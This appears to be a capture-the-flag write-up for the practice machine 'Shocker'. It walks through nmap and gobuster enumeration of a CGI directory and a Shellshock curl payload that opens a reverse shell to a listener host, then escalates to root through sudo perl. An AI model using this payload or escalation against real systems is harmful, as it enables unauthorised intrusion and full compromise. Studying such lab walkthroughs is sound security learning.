Shocker Writeup

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.56

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 80, 2222

• (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 80,2222 -oN nmap 10.10.10.56

Enumeration

Lets visit the website

It is just few words and an image and there is nothing of interest in the source code, so lets use Gobuster to find hidden directories on the webserver.

goubster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56

We only got one directory and we did not have access to it. Well now after thinking for a while, I thought about why the name of the machine is "Shocker", and there was only port for us to enumerate and that is port 80 , a webserver, so I went to google and searched something along of the lines of "Shocker website vulnerabilities" and then I found that there is a vulnerability that "Shellshock" can exploit. Further research told me that this vulnerability affect web servers that used CGI (Command Gateway Interface), a system utilized for generating dynamic web content. When thinking of CGI, we usually see directories like /cgi-bin and /cgi-sys, so I searched up different directories like that.

And it was a not found error, then I was looking at the next tab and thought why don't I add a backslash at the end of the URL and see what it does. To my surprise, it gave me 403 Forbidden Error, which means that the directory is present but we are not allowed to access it. Now I was curios as to if I could add / to every directory I was searching for with Gobuster and would that give me different results like this experiment did. (-f) for adding "/" at the end of every directory search.

We were not allowed to access "icons" , so lets try searching for directories or files in /cgi-bin/ with some common extensions. (-x) for specifying extensions

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -f -x php,html,txt,sh

Looks like we found a file, lets go check what it contains.

When visiting the page, we are given the option of downloading the file.

Exploitation

Now we do not have any other information except this bash script and it also has "Content-Type: text/plain" which is interesting , and what is the number one tool for Web exploitation? Burp Suite, so lets try checking it out on Burp Suite, I capturing the request to the script and sent it Repeater.

We have to use a tool called "curl" , a tool that is used to send web requests to a webserver using our terminal.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh

And also start a Netcat listener

nc -lvnp 1234

And when you hit enter on the command, you get a reverse shell, but as a low privilege user

Privilege Escalation

Lets run "sudo -l" to see what we can run as root.

sudo perl -e 'exec "/bin/sh";'

And we are root!